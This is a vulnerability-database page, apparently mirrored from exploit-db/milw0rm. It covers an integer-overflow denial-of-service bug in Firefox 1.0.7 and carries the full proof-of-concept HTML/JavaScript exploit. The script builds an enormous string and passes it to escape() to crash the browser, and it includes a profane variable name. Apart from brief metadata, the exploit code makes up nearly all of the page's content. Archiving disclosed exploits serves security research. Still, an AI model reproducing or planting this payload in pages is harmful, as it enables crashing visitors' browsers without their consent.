Mozilla Firefox 1.0.7 – Integer Overflow Denial of Service

Mozilla Firefox 1.0.7 – Integer Overflow Denial of Service

漏洞ID 1055397 漏洞类型
发布时间 2005-09-26 更新时间 2005-09-26
图片[1]-Mozilla Firefox 1.0.7 – Integer Overflow Denial of Service-安全小百科CVE编号 N/A
图片[2]-Mozilla Firefox 1.0.7 – Integer Overflow Denial of Service-安全小百科CNNVD-ID N/A
漏洞平台 Multiple CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/1233
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
<html>
        Copyright Georgi Guninski
        <br>
        Cannot be used in vulnerability databases
        <br>
        Especially securityfocus/mitre/cve/cert
        <script>
        var s=String.fromCharCode(257);
        var ki="";
        var me="";
        for(i=0;i<1024;i++)
        {ki=ki+s;}
        for(i=0;i<1024;i++)
        {me=me+ki;}
        var ov=s;
        for(i=0;i<28;i++) ov += ov;
        for(i=0;i<88;i++) ov += me;

        alert("done generating");
        var fuckbill=escape(ov);
        alert("done escape");
        alert(fuckbill);
        </script>
</html>

# milw0rm.com [2005-09-26]

相关推荐: MetaCart2 CurCatalogID Parameter Remote SQL Injection Vulnerability

MetaCart2 CurCatalogID Parameter Remote SQL Injection Vulnerability 漏洞ID 1096854 漏洞类型 Input Validation Error 发布时间 2005-04-26 更新时间 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享